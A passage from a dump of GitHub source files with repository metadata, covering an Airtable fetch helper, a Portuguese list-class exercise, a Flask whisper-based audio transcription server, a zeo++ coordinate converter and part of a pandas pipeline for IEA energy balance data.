filter_formula_group = filter_formulas[i:i + MAX_OR_FILTERS]\n self._session.params.update({'filterByFormula': f'OR({\",\".join(filter_formula_group)})'})\n logger.info(f'Fetching {record_type} records {i}-{i + len(filter_formula_group)} from airtable', self._user)\n self._populate_records(record_type, records)\n logger.info('Fetched {} {} records from airtable'.format(len(records), record_type), self._user)\n return records\n\n def _populate_records(self, record_type, records, offset=None):\n response = self._session.get(f'{self._url}/{record_type}', params={'offset': offset} if offset else None)\n response.raise_for_status()\n try:\n response_json = response.json()\n records.update({record['id']: record['fields'] for record in response_json['records']})\n except (ValueError, KeyError) as e:\n raise Exception(f'Unable to retrieve airtable data: {e}')\n\n if response_json.get('offset'):\n self._populate_records(record_type, records, offset=response_json['offset'])\n\n\n","repo_name":"populationgenomics/seqr","sub_path":"seqr/views/utils/airtable_utils.py","file_name":"airtable_utils.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20963978240","text":"#Solução exercício Listas\n\nclass Lista:\n '''Lista de produtos utilizando arranjos'''\n def __init__(self, TAM=5):\n self.TAM = TAM\n #Elementos da lista \n # Inicialmente: [None, None, None ,... None]\n self.__elems = [None]*TAM\n #Último índice\n self.__ultimo = 0\n\n def adicionar(self, P): \n ''' Inserir um produto no final da lista.'''\n\n tamanho = len(self.__elems)\n if self.__ultimo >= tamanho:\n #Lista sem espaço\n print(\"A lista precisa de mais espaco\")\n # Criar um novo array\n elems = [None] * (tamanho + self.TAM)\n # Copiar os elements\n self.__copiar(elems)\n # o novo array é elems\n self.__elems = elems\n\n #Inserir o elemento\n self.__elems[self.__ultimo] = P\n self.__ultimo+= 1\n\n\n def __copiar(self, elems):\n '''Metodo auxiliar para copiar os produtos'''\n #Existe uma forma mais \"Pythonic\" de fazer isto... com enumerate\n for i in range(len(self.__elems)):\n elems[i] = self.__elems[i]\n\n def tamanho(self):\n ''' Retorna o numero de elementos na lista'''\n return self.__ultimo\n\n def elemento(self, pos=0):\n '''Retorna o elemento na posição pos'''\n if pos < 0 or pos >= self.__ultimo:\n print(\"Posição não válida\");\n return None\n else:\n return self.__elems[pos];\n\n def __str__(self):\n s = \"[\";\n i=0\n while i= self.__ultimo:\n print(\"Posição não válida\")\n return\n\n #Deslocar os elementos\n for i in range(pos, self.__ultimo -1 ):\n self.__elems[i] = self.__elems[i+1]\n \n\n self.__ultimo -= 1\n self.__elems[self.__ultimo]=None\n\n def reset(self):\n '''Remover todos os elementos'''\n for i in range(self.__ultimo):\n self.__elems[i] = None\n self.__ultimo = 0\n\n def copiar(self):\n '''Criar uma copia da lista'''\n L = Lista()\n for i in range(self.__ultimo):\n L.adicionar(self.__elems[i])\n\n return L\n\n def __add__(self, L):\n '''Concatenar'''\n L2 = self.copiar()\n for i in range(L.__ultimo):\n L2.adicionar(L.__elems[i])\n return L2\n\n def reverso(self):\n '''Reverso da lista'''\n L = self.copiar()\n for i in range(L.__ultimo // 2):\n v = L.__elems[i]\n L.__elems[i] = L.__elems[L.__ultimo - i - 1]\n L.__elems[L.__ultimo - i - 1] = v\n return L\n\n\nL1 = Lista()\nL2 = Lista()\nfor i in range(10):\n L1.adicionar(i)\n L2.adicionar(i*2)\n\nprint(L1)\nL1a = L1.reverso()\nprint(L1a)\nprint(L2)\nL3 = L1 + L2\nprint(L3)\nL3.remover(6)\nprint(L3)\nL3.remover(18)\nprint(L3)\nL4 = Lista()\nL4.adicionar(5)\nL4.remover(0)\nprint(L4)\n\n","repo_name":"MarcusSilva3298/object-oriented-programming","sub_path":"Material das aulas/Aula 5 - Estrutudas de dados I - Listas, pilhas filas, etc/Resolução do Exercício.py","file_name":"Resolução do Exercício.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71650633106","text":"import asyncio\nimport os\nimport re\nimport subprocess\nimport uuid\nfrom asyncio.subprocess import PIPE\nfrom datetime import timedelta\n\nfrom flask import (Flask, Response, redirect, render_template, request,\n send_file, stream_with_context)\nfrom flask_cors import CORS\n\nfrom speaker_diff import StandardizeOutput\nfrom whisperlog import setup_logger\n\napp = Flask(\"PODV2T\")\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=60)\nCORS(app, send_wildcard=True, resources={r\"/\": {\"origins\": \"\"}})\n\nBASE_PATH = os.getcwd()\nMODELS_PATH = os.path.join(BASE_PATH, 'models')\nMODEL_PATH = os.path.join(MODELS_PATH, 'ggml-model-whisper-base.en.bin')\nWHISPER_BINARY = os.path.join(BASE_PATH, 'bin', 'main')\nMEDIA_PATH = os.path.join(BASE_PATH, 'media')\n\nlog_file = os.path.join(os.getcwd(), 'app.log')\n\nlogger = setup_logger('app', log_file)\n\nif not os.path.exists(MEDIA_PATH):\n os.makedirs(MEDIA_PATH)\n\n\ndef run_subprocess(args, tempfile):\n try:\n logger.info(\"Running subprocess %s\", args)\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n for line in iter(proc.stdout.readline, ''):\n if not line:\n break\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip().split(\"]\")[1]\n logger.info(\"line: %s\", line)\n tempfile.write(line)\n yield f\"{line}\"\n else:\n continue\n except Exception as e:\n logger.error(\"An error occurred while running subprocess %s: %s\", args, e)\n finally:\n if proc:\n logger.info(\"Terminating subprocess\")\n proc.terminate()\n\n\ndef transcribe_audio(wav_file, csv_file):\n args = [WHISPER_BINARY, \"-m\", MODEL_PATH, \"-ocsv\", \"-f\", wav_file, \"-of\", csv_file]\n try:\n with open(os.path.join(MEDIA_PATH, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n logger.info(f\"Transcribing {wav_file} to {csv_file}\")\n logger.debug(f\"Running command: {' '.join(args)}\")\n logger.debug(\"Command output:\")\n yield from run_subprocess(args, tmp_file)\n except Exception as e:\n logger.error(\"An error occurred while transcribing audio for file %s: %s\", wav_file, e)\n raise # This will raise the exception to the calling function\n else:\n logger.info(\"Transcription complete\")\n\n\ndef transcript_generator(uuid_str):\n temp_dir = \"media\"\n base_file_name = f\"{temp_dir}/{uuid_str}\"\n wav_file_path = f\"{base_file_name}.wav\"\n csv_file_path = f\"{MEDIA_PATH}/{uuid_str}.csv\"\n\n try:\n yield \"Transcribing audio...\\n\"\n with open(os.path.join(temp_dir, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n yield from transcribe_audio(wav_file_path, csv_file_path)\n speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n speaker_diar.get_standardized_output()\n yield f\"Speaker diff output:\\n{speaker_diar.final_output}\\n\"\n except Exception as e:\n logger.error(\"An error occurred while transcribing audio for file %s: %s\", uuid_str, e)\n raise # This will raise the exception to the calling function\n else:\n yield f\"\\nTranscribed: http://localhost:8833/download/{uuid_str}.csv\"\n finally:\n if os.path.exists(wav_file_path):\n os.remove(wav_file_path)\n if os.path.exists(csv_file_path):\n os.remove(csv_file_path)\n with open(os.path.join(temp_dir, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n tmp_file.write(\"\\n\")\n\n\n@app.route('/transcribe', methods=[\"GET\", \"POST\"])\ndef transcription():\n gen_uuid_str = request.query_string.split(b'=')[1].decode('utf-8').split('.')[0]\n logger.info(f\"gen_uuid_str: {gen_uuid_str}\")\n return Response(stream_with_context(transcript_generator(gen_uuid_str)))\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == 'GET':\n return render_template('index.html')\n\n\n@app.route('/t', methods=['GET', 'POST'])\nasync def upload_file():\n if request.method == 'POST':\n try:\n file = request.files['file']\n file_name = file.filename\n ext = re.search(r'\\.([a-zA-Z0-9]+)$', file_name).group(1)\n uuid_str = str(uuid.uuid4())\n file_new = f\"{uuid_str}.{ext}\"\n file_converted = f\"{uuid_str}.wav\"\n file.save(os.path.join('media', file_new))\n logger.info(\"\\033[43mSAVED %s to %s!\\033[0m\", file_name, file_new)\n\n p1 = await asyncio.create_subprocess_exec(\n \"ffprobe\",\n \"-v\",\n \"error\",\n \"-select_streams\",\n \"a:0\",\n \"-show_entries\",\n \"stream=codec_name:stream_tags=language\",\n \"-of\",\n \"default=noprint_wrappers=1:nokey=1\",\n f'media/{file_new}',\n stdout=PIPE,\n )\n codec = await p1.stdout.read()\n codec = codec.decode(\"utf8\").strip()\n logger.info(\"codec is %s\", codec)\n if codec != 'pcm_mulaw':\n logger.info('CONVERTING FILE TO WAV....')\n process_convert = await asyncio.create_subprocess_exec(\n \"ffmpeg\",\n \"-loglevel\",\n \"panic\",\n \"-i\",\n f\"media/{file_new}\",\n \"-y\",\n \"-probesize\",\n \"32\",\n \"-ar\",\n \"16000\",\n \"-ac\",\n \"1\",\n \"-acodec\",\n \"pcm_s16le\",\n f\"media/{file_converted}\",\n )\n await process_convert.communicate()\n logger.info('CONVERTED FILE TO WAV!')\n os.remove(f\"media/{file_new}\")\n\n return redirect(f\"/transcribe?file={file_converted}\")\n except Exception as e:\n logger.error(\"file not found ... %s\", e)\n return redirect('/')\n\n\n@app.route('/url', methods=[\"GET\", \"POST\"])\ndef tr_url():\n def gen():\n source_url = request.form.get('url')\n temp_dir = os.path.join(os.getcwd(), 'media')\n if not os.path.exists(temp_dir):\n os.mkdir(temp_dir)\n\n uuid_str = str(uuid.uuid4())\n base_file_name = f\"{temp_dir}/{uuid_str}\"\n yield f\"Downloading media.... {source_url}\"\n subprocess.run(\n [\n \"yt-dlp\",\n \"-f\",\n \"bestaudio[ext=m4a]/best[ext=mp4]/best\",\n \"--xattrs\",\n f\"{source_url}\",\n \"-o\",\n f\"{base_file_name}.mp4\",\n ]\n )\n yield \"Extracting Audio and Resampling...\"\n logger.info(\"Extracting audio and resampling...\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n f\"{base_file_name}.mp4\",\n \"-hide_banner\",\n \"-loglevel\",\n \"error\",\n \"-ar\",\n \"16000\",\n \"-ac\",\n \"1\",\n \"-c:a\",\n \"pcm_s16le\",\n \"-y\",\n f\"{base_file_name}.wav\",\n ]\n )\n logger.info(\"Transcribing...\")\n yield \"Transcribing audio...\"\n proc = subprocess.Popen(\n [\n WHISPER_BINARY,\n \"-m\",\n MODEL_PATH,\n \"-ocsv\",\n \"-f\",\n f\"{base_file_name}.wav\",\n \"-t\",\n \"8\",\n \"-of\",\n f\"media/{uuid_str}\",\n ],\n stdout=subprocess.PIPE,\n )\n transcript_file = open(f\"{temp_dir}/transcript_{uuid_str}.txt\", \"a\", encoding=\"utf-8\")\n\n # Generator for the transcript\n for line in iter(proc.stdout.readline, ''):\n if not line:\n yield f\"{uuid_str}.csv\"\n break\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip().split(\"]\")[1]\n transcript_file.write(line)\n yield f\"{line}\"\n else:\n continue\n # Run speaker_diff\n wav_file_path = f\"{base_file_name}.wav\"\n csv_file_path = f\"{base_file_name}.csv\"\n speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n speaker_diar.get_standardized_output()\n\n return Response(stream_with_context(gen()))\n\n\n@app.route('/download//', methods=[\"GET\"])\ndef download_file(uuid_str, transcription_type):\n temp_dir = os.path.join(os.getcwd(), 'media')\n if transcription_type == \"w\":\n return send_file(f\"{temp_dir}/{uuid_str}.wav\", as_attachment=True)\n if transcription_type == \"f\":\n return send_file(f\"{temp_dir}/transcript_{uuid_str}.txt\", as_attachment=True)\n if transcription_type == \"x\":\n return send_file(f\"{temp_dir}/{uuid_str}.fo.txt\", as_attachment=True)\n if transcription_type == \"r\":\n return send_file(f\"{temp_dir}/{uuid_str}.rttm\", as_attachment=True)\n if transcription_type == \"c\":\n return send_file(f\"{temp_dir}/{uuid_str}.csv\", as_attachment=True)\n\n\n@app.route('/static/styles.css', methods=[\"GET\"])\ndef styles():\n return render_template('styles.css')\n\n\nif __name__ == '__main__':\n logger.info('Starting server...')\n port = int(os.environ.get('PORT') if os.environ.get('PORT') is not None else 8833)\n app.run(debug=False, port=port)\n\n'''\n\ndef download_and_resample_audio(source_url, base_file_name):\n \"\"\"\n Download the audio file from the specified source URL, resample it to 16kHz\n and convert it to a WAV file.\n\n Args:\n source_url (str): The URL of the source audio file.\n base_file_name (str): The base filename for the downloaded and converted files.\n\n Returns:\n None\n \"\"\"\n subprocess.run(\n ['yt-dlp', '-f', 'bestaudio[ext=m4a]/best[ext=mp4]/best', '--xattrs', source_url, '-o', f'{base_file_name}.mp4']\n )\n subprocess.run(\n [\n 'ffmpeg',\n '-i',\n f'{base_file_name}.mp4',\n '-hide_banner',\n '-loglevel',\n 'error',\n '-ar',\n '16000',\n '-ac',\n '1',\n '-c:a',\n 'pcm_s16le',\n '-y',\n f'{base_file_name}.wav',\n ]\n )\n logger.info(\"Resampled audio\")\n\n\ndef generate(proc, tmp_file):\n for line in iter(proc.stdout.read, ''):\n if not line:\n break\n if line.startswith(b\"output_csv:\"):\n break\n if not line.startswith(b\"whisper_\") and not line.startswith(b\"main:\"):\n line = line.decode(\"utf8\").strip()\n tmp_file.write(line)\n tmp_file.write(\"\\n\")\n yield f\"{line}\"\n else:\n continue\n\n\ndef generate_with_ts(proc, tmp_file):\n for line in iter(proc.stdout.readline, ''):\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip()\n tmp_file.write(line)\n tmp_file.write(\"\\n\")\n yield f\"{line}\"\n if not line:\n break\n else:\n continue\n\n# def transcribe_audio(base_file_name, uuid_str):\n# proc = subprocess.Popen(\n# [WHISPER_BINARY, '-m', MODEL_PATH, '-ocsv', '-f', f'{base_file_name}.wav', '-of', f'{MEDIA_PATH}/{uuid_str}'],\n# stdout=subprocess.PIPE,\n# )\n# transcript_file = open(f\"{MEDIA_PATH}/transcript_{uuid_str}.txt\", \"a\", encoding=\"utf-8\")\n# # Generator for the transcript\n# for line in iter(proc.stdout.readline, b''):\n# if not line:\n# break\n# if line.startswith(b\"[\"):\n# line = line.decode(\"utf8\").strip().split(\"]\")[1]\n# transcript_file.write(line)\n# yield f\"{line}\\n\"\n# else:\n# continue\n\n# # Run speaker_diff\n# wav_file_path = f\"{base_file_name}.wav\"\n# csv_file_path = f\"{MEDIA_PATH}/{uuid_str}.csv\"\n# speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n# speaker_diar.get_standardized_output()\n# yield f\"Speaker diff output:\\n{speaker_diar.final_output}\\n\"\n\n'''\n","repo_name":"clockcoinG1/whisper_transcription_and_diarization_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1594458316","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Distributed under the terms of the MIT License.\n\n\"\"\"\nFunctions that are useful for zeo++ usage\n\nAuthor: Andrew Tarzia\n\nDate Created: 28 Jul 2019\n\"\"\"\n\n\ndef convert_zsa_to_xyz(file):\n \"\"\"\n Convert .zsa coordinates into XYZ file for visualisation.\n\n \"\"\"\n with open(file, 'r') as f:\n data = f.readlines()\n\n for i, j in enumerate(data):\n if 'color red' in j:\n red_mention = i\n\n greens = data[1:red_mention]\n reds = data[red_mention+1:]\n\n n_atoms = len(greens) + len(reds)\n xyz_file = file.replace('.zsa', '_z.xyz')\n\n with open(xyz_file, 'w') as f:\n f.write(f'{n_atoms}\\nWritten by Andrew Tarzia!\\n')\n for g in greens:\n id = 'H'\n D = g.rstrip().replace('{', '').replace('}', '')\n x, y, z = [\n i for i in D.replace('point', '').split(' ') if i\n ]\n f.write(f'{id} {x} {y} {z}\\n')\n for g in reds:\n id = 'P'\n D = g.rstrip().replace('{', '').replace('}', '')\n x, y, z = [\n i for i in D.replace('point', '').split(' ') if i\n ]\n f.write(f'{id} {x} {y} {z}\\n')\n","repo_name":"andrewtarzia/atools","sub_path":"atools/zeopp_f.py","file_name":"zeopp_f.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3280302913","text":"# region\n\nimport multiprocessing\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom numpy import NaN\nfrom pandarallel import pandarallel\nfrom scipy.optimize import differential_evolution\n\npandarallel.initialize(progress_bar=True)\n\n# endregion\n\n\n# define a function to process the dataframes in parallel\ndef process_df_function(regions, data_start_year, data_end_year):\n energy_historical_temp = pd.DataFrame([])\n\n for region in regions:\n # Handle \"x\", \"c\", \"..\" qualifiers. IEA documentation is not clear on what\n # \"x\" represents; \"c\" represents \"confidential\",\n # \"..\" represents \"not available\"\n energy_historical = (\n pd.DataFrame(\n pd.read_fwf(\n str(\"podi/data/IEA/\" + region + \".txt\"),\n colspecs=[\n (0, 15),\n (16, 31),\n (32, 47),\n (48, 63),\n (64, 70),\n (71, -1),\n ],\n names=[\n \"region\",\n \"product_short\",\n \"year\",\n \"flow_short\",\n \"unit\",\n \"value\",\n ],\n dtype={\n \"region\": \"category\",\n \"product_short\": \"category\",\n \"year\": \"int\",\n \"flow_short\": \"category\",\n \"unit\": \"category\",\n },\n )\n )\n .replace([\"c\"], NaN)\n .replace([\"..\"], NaN)\n .replace([\"x\"], NaN)\n )\n\n # Change values to float\n energy_historical[\"value\"] = energy_historical[\"value\"].astype(float)\n\n # Change from all caps to lowercase\n energy_historical[\"region\"] = energy_historical[\"region\"].str.lower()\n\n # Format as a dataframe with timeseries as rows\n energy_historical = pd.pivot_table(\n energy_historical,\n values=\"value\",\n index=[\"region\", \"product_short\", \"flow_short\", \"unit\"],\n columns=\"year\",\n )\n\n # Not all regions have placeholders for all years, so they need to be created\n energy_historical = pd.DataFrame(\n index=energy_historical.index,\n columns=np.arange(data_start_year, data_end_year + 1, 1),\n data=NaN,\n ).combine_first(energy_historical)\n\n # Backfill missing data using oldest data point\n energy_historical = energy_historical.fillna(method=\"backfill\", axis=1)\n\n # For rows with data only prior to data_start_year, front fill to data_start_year\n energy_historical.update(\n energy_historical[energy_historical.loc[:, data_start_year].isna()]\n .loc[:, :data_start_year]\n .fillna(method=\"ffill\", axis=1)\n )\n\n # Remove duplicate regions created due to name overlaps\n energy_historical = energy_historical.loc[[region.lower()], :]\n\n # Filter for data start_year and data_end_year, which can be different depending on region/product/flow because data becomes available at different times\n energy_historical = energy_historical.loc[\n :, data_start_year:data_end_year\n ]\n\n # Build dataframe consisting of all regions\n energy_historical_temp = pd.concat(\n [energy_historical_temp, energy_historical]\n )\n\n return energy_historical_temp\n\n\ndef energy(model, scenario, data_start_year, data_end_year, proj_end_year):\n ############################\n # LOAD HISTORICAL ENERGY #\n ############################\n\n # region\n\n # Download IEA World Energy Balances. As of Q1 2023, this dataset must be\n # purchased. Choose the ZIP format of the 'World energy balances' file\n # available [here](https://www.iea.org/data-and-statistics/data-product/\n # world-energy-balances). Download the file to `pd/data/IEA` on your local\n # machine and extract the file. Run the 'splitregion.sh' script, which\n # splits the data by region and saves each to a .txt file with the\n # filename matching the region name.\n\n # Load historical energy data for each region.\n regions_list = np.array_split(\n pd.read_csv(\"podi/data/IEA/Regions.txt\").squeeze(\"columns\"),\n multiprocessing.cpu_count(),\n )\n\n with multiprocessing.Pool() as pool:\n energy_historical = pd.concat(\n pool.starmap(\n process_df_function,\n zip(\n regions_list,\n [(data_start_year) for _ in regions_list],\n [(data_end_year) for _ in regions_list],\n ),\n )\n )\n\n # Add model and scenario indices\n energy_historical = pd.concat(\n [\n pd.concat(\n [energy_historical], keys=[\"baseline\"], names=[\"scenario\"]\n )\n ],\n keys=[\"PD22\"],\n names=[\"model\"],\n )\n\n # set energy_historical index 'model' and 'scenario' to dtype 'category'\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[0].astype(\"category\"),\n level=0,\n )\n\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[1].astype(\"category\"),\n level=1,\n )\n\n # Filter product categories that are redundant or unused\n products = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/IEA/Other/IEA_Product_Definitions.csv\",\n usecols=[\"product_category\", \"product_short\"],\n dtype={\n \"product_category\": \"category\",\n \"product_short\": \"category\",\n },\n )\n )\n .set_index(\"product_category\")\n .loc[\n [\n \"Biofuels and Waste\",\n \"Coal\",\n \"Crude, NGL, refinery feedstocks\",\n \"Electricity and Heat\",\n \"Natural gas\",\n \"Oil products\",\n \"Oil shale\",\n \"Peat and peat products\",\n ]\n ]\n )[\"product_short\"]\n\n # Filter out products that are summations of other products\n products = products[\n ~products.isin(\n [\n \"TOTAL\",\n \"TOTPRODS\",\n \"SOLWIND\",\n \"MTOTSOLID\",\n \"MTOTOIL\",\n \"MTOTOTHER\",\n \"MRENEW\",\n \"CRNGFEED\",\n \"COMRENEW\",\n ]\n )\n ]\n\n # Filter out flow categories that are redundant or unused\n flows = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/IEA/Other/IEA_Flow_Definitions.csv\",\n usecols=[\"flow_category\", \"flow_short\"],\n dtype={\"flow_category\": \"category\", \"flow_short\": \"category\"},\n )\n )\n .set_index(\"flow_category\")\n .loc[\n [\n \"Energy industry own use and Losses\",\n \"Electricity output\",\n \"Final consumption\",\n \"Heat output\",\n \"Supply\",\n \"Transformation processes\",\n ]\n ]\n )[\"flow_short\"]\n\n # Filter out flows that are summations of other products or for energy balance\n # purposes (exports, imports, statistical differences, stock changes, transfers)\n flows = flows[\n ~flows.isin(\n [\n \"ELOUTPUT\",\n \"EXPORTS\",\n \"HEATOUT\",\n \"IMPORTS\",\n \"INDPROD\",\n \"LIQUEFAC\",\n \"NONENUSE\",\n \"STATDIFF\",\n \"STOCKCHA\",\n \"TES\",\n \"TFC\",\n \"TRANSFER\",\n \"TOTIND\",\n \"TOTTRANF\",\n \"TOTTRANS\",\n \"TOTENGY\",\n \"OWNUSE\",\n ]\n )\n ]\n\n energy_historical = energy_historical.loc[\n slice(None), slice(None), slice(None), products, flows\n ]\n\n # Add IRENA data for select electricity technologies by downloading for all regions,\n # all technologies, and all years from https://pxweb.irena.org/pxweb/en/IRENASTAT/IRENASTAT__Power%20Capacity%20and%20Generation/RE-ELECGEN_2022_cycle2.px/.\n # Select the download option 'Comma delimited with heading' and save as a csv file\n # in podi/data/IRENA/ . Change the header in column A from 'Region/country/area' to\n # 'region'. Double check that the filename is 'RE-ELECGEN_20220805-204524.csv' and\n # if not, update the filename below.\n\n # region\n irena = pd.read_csv(\n \"podi/data/IRENA/RE-ELECGEN_20220805-204524.csv\", header=2\n )\n\n # Filter for technologies that are not overlapping, and rename 'Technology' index\n # to 'product_short'\n irena = irena.loc[\n irena[\"Technology\"].isin(\n [\"Onshore wind energy\", \"Offshore wind energy\"]\n )\n ].replace(\n {\n \"Technology\": {\n \"Onshore wind energy\": \"ONSHORE\",\n \"Offshore wind energy\": \"OFFSHORE\",\n }\n }\n )\n irena.rename(columns={\"Technology\": \"product_short\"}, inplace=True)\n\n # Add index flow_short\n irena[\"flow_short\"] = \"ELMAINE\"\n\n # Replace \"..\" with NaN\n irena.replace(\"..\", 0, inplace=True)\n\n # Add index labels for model, scenario, unit (in GWh but will be converted to TJ\n # later in this section with the other 'Electricity Ouput' variables)\n irena[\"model\"] = model\n irena[\"scenario\"] = \"baseline\"\n irena[\"unit\"] = \"TJ\"\n irena.set_index(\n [\"model\", \"scenario\", \"region\", \"product_short\", \"flow_short\", \"unit\"],\n inplace=True,\n )\n\n # Add WEB region names\n regions = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/region_categories.csv\",\n usecols=[\"WEB Region\", \"IRENA Region\"],\n dtype={\"WEB Region\": \"category\", \"IRENA Region\": \"category\"},\n ).dropna(axis=0)\n )\n .set_index([\"IRENA Region\"])\n .rename_axis(index={\"IRENA Region\": \"region\"})\n )\n\n irena = (\n irena.reset_index()\n .merge(regions, left_on=[\"region\"], right_on=[\"region\"])\n .set_index(\n [\n \"model\",\n \"scenario\",\n \"WEB Region\",\n \"region\",\n \"product_short\",\n \"flow_short\",\n \"unit\",\n ]\n )\n .droplevel(\"region\")\n .rename_axis(index={\"WEB Region\": \"region\"})\n )\n irena.index = irena.index.set_levels(\n irena.index.levels[2].str.lower().astype(\"category\"), level=2\n )\n\n # Set column type\n irena.columns = irena.columns.astype(int)\n\n # Add missing years between first_valid_index and data_start_year\n irena[np.arange(data_start_year, irena.columns.min(), 1)] = 0\n irena = irena.reindex(sorted(irena.columns), axis=1)\n\n # Filter for data_start_year and data_end_year\n irena = irena.loc[:, data_start_year:data_end_year]\n\n # IRENA data starts at 2000, so if data_start_year is <2000, use IEA data for WIND,\n # assuming it is onshore. Then. Drop IEA WIND and SOLARPV to avoid duplication with\n # IRENA ONSHORE/OFFSHORE\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=\"WIND\", level=3),\n pd.concat(\n [\n energy_historical[\n energy_historical.index.get_level_values(3).isin(\n [\"WIND\"]\n )\n ]\n .loc[:, :2000]\n .rename(index={\"WIND\": \"ONSHORE\"}),\n irena[\n irena.index.get_level_values(3).isin([\"ONSHORE\"])\n ].loc[:, 2001:],\n ],\n axis=1,\n ),\n irena[irena.index.get_level_values(3).isin([\"OFFSHORE\"])],\n ]\n )\n\n # endregion\n\n # Add product and flow labels to energy_historical\n\n labels = pd.DataFrame(\n pd.read_csv(\n \"podi/data/product_flow_labels.csv\",\n usecols=[\n \"product_short\",\n \"flow_short\",\n \"sector\",\n \"EIA Product\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n )\n ).set_index([\"product_short\", \"flow_short\"])\n\n energy_historical = (\n (\n energy_historical.reset_index()\n .set_index([\"product_short\", \"flow_short\"])\n .merge(labels, on=[\"product_short\", \"flow_short\"])\n )\n .reset_index()\n .set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_short\",\n \"flow_short\",\n \"unit\",\n \"EIA Product\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ]\n )\n )\n\n # Flow AGRICULT was doubled to create sectors 'Agriculture' and 'Forests & Wetlands'. Scale down to estimate 80% in 'Agriculture' and 20% in 'Forests & Wetlands'\n\n # region\n\n energy_historical.loc[\n (energy_historical.reset_index().sector == \"Forests & Wetlands\").values\n ] = energy_historical.loc[\n (energy_historical.reset_index().sector == \"Forests & Wetlands\").values\n ].apply(\n lambda x: x * 0.2\n )\n\n energy_historical.loc[\n (energy_historical.reset_index().sector == \"Agriculture\").values\n ] = energy_historical.loc[\n (energy_historical.reset_index().sector == \"Agriculture\").values\n ].apply(\n lambda x: x * 0.8\n )\n\n # endregion\n\n # Split ROAD Flow into Two- and three-wheeled, Light, Medium (Buses), Heavy (Trucks)\n\n # region\n\n subsector_props = pd.DataFrame(\n pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ),\n ).set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n\n # Create Two- and three-wheeled Flow (TTROAD) using estimate of the fraction of\n # ROAD that is Two- and three-wheeled\n ttroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2],\n \"ROAD\",\n \"baseline\",\n x.name[3],\n \"Two- and three-wheeled\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"TTROAD\"})\n )\n\n # Create Light-duty Flow (LIGHTROAD) using estimate of the fraction of ROAD that is\n # Light-duty vehicles\n lightroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"LIGHTROAD\"})\n )\n\n # Create Medium-duty Flow (MEDIUMROAD) using estimate of the fraction of ROAD that\n # is Medium-duty vehicles (Buses and Vans)\n mediumroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Medium\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"MEDIUMROAD\"})\n )\n\n # Create Heavy-duty Flow (HEAVYROAD) using estimate of the fraction of ROAD that is\n # Heavy-duty vehicles (Trucks)\n heavyroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"HEAVYROAD\"})\n )\n\n # Drop ROAD Flow and add TTROAD, LIGHTROAD, MEDIUMROAD, HEAVYROAD\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"ROAD\"], level=5),\n ttroad,\n lightroad,\n mediumroad,\n heavyroad,\n ]\n )\n\n # endregion\n\n # Split DOMESAIR Flow into Short-range, Long-range\n\n # region\n\n # Create Short-range Flow (SDOMESAIR) using estimate of the fraction of DOMESAIR\n # that is Short-range\n sdomesair = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"DOMESAIR\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], 